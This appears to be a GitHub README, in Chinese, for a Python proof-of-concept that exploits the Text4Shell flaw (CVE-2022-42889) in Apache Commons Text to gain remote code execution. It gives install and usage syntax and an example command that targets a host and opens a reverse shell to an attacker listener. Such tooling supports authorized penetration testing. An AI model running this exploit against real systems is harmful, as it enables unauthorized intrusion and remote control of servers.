Goultarde/CVE-2022-42889-text4shell
GitHub: Goultarde/CVE-2022-42889-text4shell
针对 Apache Commons Text Text4Shell 漏洞(CVE-2022-42889)的自动化渗透测试 PoC 脚本,通过脚本插值触发 RCE 并建立反弹 Shell。
Stars: 0 | Forks: 0
# CVE-2022-42889-text4shell
## 描述
该脚本是一个渗透测试工具,旨在利用 Apache Commons Text(版本 < 1.10.0)中的 CVE-2022-42889 漏洞(也称为 Text4Shell)。它可以自动投递基于 Java 的 payload 以触发反弹 shell。
此实现基于公开的漏洞利用代码:[https://www.exploit-db.com/exploits/52261](https://www.exploit-db.com/exploits/52261)
## 功能
* 使用 argparse 处理命令行参数,提供更好的可用性。
* 精确的 URL 编码,确保与 Java payload 的兼容性。
* 支持自定义路径和易受攻击的参数目标。
## 用法
### 前置条件
该脚本需要 Python 3 和 requests 库。
```
pip install requests
```
### 语法
```
python3 exploit.py -t $IP -p $PORT -u -param $PARAMETER -L $LHOST -P $LPORT
```
### 示例
```
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
```
## 免责声明
本工具仅供教育目的和授权的渗透测试使用。对于因滥用此脚本而造成的任何损害,作者不承担任何责任。
标签:CISA项目, Go语言工具, Python, 无后门, 概念验证